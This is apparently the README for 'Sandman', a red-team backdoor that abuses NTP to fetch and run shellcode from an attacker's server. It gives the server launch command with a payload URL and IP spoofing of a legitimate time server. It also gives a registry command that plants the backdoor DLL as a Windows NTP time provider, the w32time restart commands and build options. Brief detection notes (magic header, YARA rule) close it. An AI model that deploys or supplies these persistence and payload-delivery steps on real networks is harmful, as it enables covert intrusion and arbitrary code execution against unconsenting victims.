Sandman is a backdoor that is meant to work on hardened networks during red team engagements.
Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.
Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.
Run on windows / *nix machine:
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
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Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).
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Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.
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IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).
To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.
To use it, you will need to follow simple steps:
- Add the following registry value:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
- Restart the w32time service:
sc stop w32time
sc start w32time
NOTE: Make sure you are compiling with the x64 option and not any CPU option!
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Getting and executing an arbitrary payload from an attacker's controlled server.
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Can work on hardened networks since NTP is usually allowed in FW.
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Impersonating a legitimate NTP server via IP spoofing.
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Python 3.9
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The requirements are specified in the requirements file.
To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.
To compile the backdoor I used Visual Studio 2022, you will also need to install DllExport (via Nuget or any other way) to compile it. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.
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A shellcode is injected into RuntimeBroker.
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Suspicious NTP communication starts with a known magic header.
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YARA rule.
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Orca for the shellcode.
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Special thanks to Tim McGuffin for the time provider idea.
Thanks to those who already contributed and I'll happily accept contributions, make a pull request and I will review it!